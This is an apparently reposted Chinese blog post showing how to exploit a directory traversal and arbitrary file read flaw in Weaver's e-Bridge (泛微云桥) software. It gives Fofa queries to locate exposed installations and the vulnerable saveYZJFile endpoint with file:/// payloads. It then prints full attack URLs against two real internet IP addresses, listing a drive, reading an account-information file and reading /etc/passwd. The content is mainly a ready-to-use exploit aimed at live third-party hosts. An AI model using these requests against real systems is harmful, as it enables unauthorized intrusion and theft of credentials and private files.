js读取同目录下的文件_泛微云桥目录遍历和文件读取

js读取同目录下的文件_泛微云桥目录遍历和文件读取Fofa app 泛微 云桥 e Bridge 试了一下 目标挺多的 fofa 搜到的第一个就存在漏洞 然后大部分软件装在 windows 系统上 极小部分安装在 linux 系统上 搜 linux 目标要限定系统 app 泛微 云桥 e Bridge amp amp

大家好,我是讯享网,很高兴认识大家。

Fofa: app="泛微-云桥e-Bridge"

试了一下,目标挺多的,fofa搜到的第一个就存在漏洞,然后大部分软件装在windows系统上,极小部分安装在linux系统上,搜linux目标要限定系统

app="泛微-云桥e-Bridge" && os="ubuntu"

目录遍历和文件读取取决于downloadUrl参数

/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt

downloadUrl参数填写文件的绝对路径时,可以造成任意文件读取;

downloadUrl参数填写目录的绝对路径时,可以造成目录遍历。

然后访问/file/fileNoLogin/id,id就是第一个请求页面所得到的id值

Windows目标,以fofa上搜到的某互联网目标为例。

D盘目录遍历

http://223.99.199.138:8088/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///D:/&fileExt=txt

ba002aa95d5448d7076433b35d83e190.png
讯享网

http://223.99.199.138:8088/file/fileNoLogin/e15782b0df7245c9847c252d7e8cd01e

ed1e4debd21c412279e0ca607ad70607.png

这样就读取了d盘下的文件列表。接下来读取上图中d盘下文件【账号信息.txt】

http://223.99.199.138:8088/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///D:/帐号信息.txt&fileExt=txt

9dd29ba43b56e93a117e4834c478de4c.png

http://223.99.199.138:8088/file/fileNoLogin/0b7d2d4c4f936f9fd

c3edb83732f2f3d10447a2119d303b93.png

Linux也差不多,也是互联网目标,以/etc/passwd为例

http://202.104.111.228:8089/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/&fileExt=txt

9b5074263768bc9abc3e9cc621633ba4.png

http://202.104.111.228:8089/file/fileNoLogin/2a79e8a4f09649f3a189bc7da

6218301c73e10b88ddad3907c53f4721.png

http://202.104.111.228:8089/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt

418ec9b85acf62e8aeffd19bf7edd306.png

http://202.104.111.228:8089/file/fileNoLogin/4a46e117fe6d4f63b7eb794c9416f16a

d871c1bde053ab1564331f91017b2026.png

不一定是要先目录遍历再文件读取,上面这样做只是为了记录演示而已。

小讯
上一篇 2025-01-08 15:18
下一篇 2025-02-18 07:34

相关推荐

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容,请联系我们,一经查实,本站将立刻删除。
如需转载请保留出处:https://51itzy.com/kjqy/43117.html